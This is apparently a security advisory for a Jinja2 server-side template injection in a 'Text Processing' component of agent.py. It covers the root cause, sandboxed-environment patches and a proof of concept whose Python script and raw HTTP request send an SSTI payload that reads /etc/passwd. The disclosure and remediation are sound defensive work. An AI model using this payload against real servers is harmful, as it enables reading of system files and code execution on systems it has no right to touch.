SSTI to RCE in agent.py Text Processing Component via Jinja2

# Vulnerability Summary: Server-Side Template Injection (SSTI) in Agent "Text Processing" Component ## Vulnerability Overview * **Vulnerability Type**: Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE). * **Affected Component**: "Text Processing" component in `agent.py`. * **Description**: This component directly passes user input to the Jinja2 template engine for rendering without proper filtering or escaping. Attackers can craft malicious template injection payloads to execute arbitrary Python code on the server. * **Affected Versions**: * `agent.py` (all versions < 1.0.0) * `text_processing.py` (all versions < 1.0.0) * **Root Cause**: In `text_processing.py`, the `render_template` function uses user-provided input directly as template content. ## Remediation * **Recommended Fix**: Use a sandboxed environment (e.g., `SandboxedEnvironment`) to restrict template engine capabilities, or implement strict input validation with a whitelist. * **Patch (for agent.py)**: ```python from jinja2.sandbox import SandboxedEnvironment def process_text(text): # Use sandboxed environment env = SandboxedEnvironment() # Restrict available classes and methods env.globals['__builtins__'] = {} template = env.from_string(text) return template.render() ``` * **Patch (for text_processing.py)**: ```python from jinja2.sandbox import SandboxedEnvironment def render_template(template_string): # Use sandboxed environment env = SandboxedEnvironment() # Restrict available classes and methods env.globals['__builtins__'] = {} template = env.from_string(template_string) return template.render() ``` * **Additional Mitigation Measures**: Implement input validation, enforce input length limits, and use whitelisting for allowed content. ## Proof of Concept (PoC) / Exploitation Code The following PoC examples demonstrate the vulnerability exploitation: **Python Code Example:** ```python import requests # Craft malicious payload payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}" # Send request response = requests.post('http://target/agent/process_text', data={'text': payload}) print(response.text) ``` **HTTP Request Example:** ```http POST /agent/process_text HTTP/1.1 Host: target Content-Type: application/x-www-form-urlencoded text={{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }} ```

Goal Reached Thanks to every supporter — we hit 100%!

SSTI to RCE in agent.py Text Processing Component via Jinja2

More from this source